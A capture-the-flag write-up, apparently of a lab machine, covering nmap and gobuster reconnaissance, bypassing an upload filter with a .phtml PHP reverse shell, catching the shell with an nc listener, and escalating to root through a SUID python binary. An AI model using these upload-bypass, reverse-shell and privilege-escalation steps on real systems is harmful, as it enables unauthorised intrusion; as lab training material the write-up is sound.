Recon
To better understand the machine we start with a simple recon using the following code:
sudo nmap -sV -A -T4 10.10.177.103 -oN nmap_results.txt
# Obtaining the following output
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
| 256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_ 256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
These results show we have:
- SSH server: we might be able to use this if we find a private key or bruteforce password if we find a list of users;
- HTTP Server: should explore the website to find potential file uploads or logins we can exploit to create a user list.
Directory Search
Since this process can take a while we should start before exploring the website. We do as follows:
gobuster dir -t 64 -u http://10.10.177.103:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
Access Website
We consult the homepage the robots page and both fail to provide any additional information
Homepage
Robots
Gobuster Results
After a while our command ends with the following results
/uploads (Status: 301) [Size: 316] [--> http://10.10.177.103/uploads/]
/css (Status: 301) [Size: 312] [--> http://10.10.177.103/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.177.103/js/]
/panel (Status: 301) [Size: 314] [--> http://10.10.177.103/panel/]
/server-status (Status: 403) [Size: 278]
Getting Access
With the recon finalized, we understand there is an option to obtain reverse shell using a php script.
Panel
This page allows us to upload a file so we should prepare a PHP reverse shell as it is a Apache server, which commonly uses PHP. The upload files fails as it does not accept .php files
We can now try several extensions until one works (E.g. php3, php4, phtml, etc.) and, we are able to succeed using phtml.
Obtaining shell
We can now launch our listener nc -lvnp 8080
and obtain shell using the file we uploaded through 10.10.177.103/uploads.
Find Flag
To find flag we can use find / -name "user.txt" 2>/dev/null
and use cat to get content
Privilege Escalation
SUID
Our first instinct was to find these types of files using:
find / -type f -perm -04000 -ls 2>/dev/null
787696 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
787234 112 -rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
918336 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
787659 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
787841 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
787845 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
787467 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
787290 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
787288 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
787086 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
...
...
We see that python can be exploited to escalate our privileges
using /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Obtaining final flag
To find flag we can use find / -name "root.txt" 2>/dev/null
and use cat to get content.
Kanelao
Top comments (0)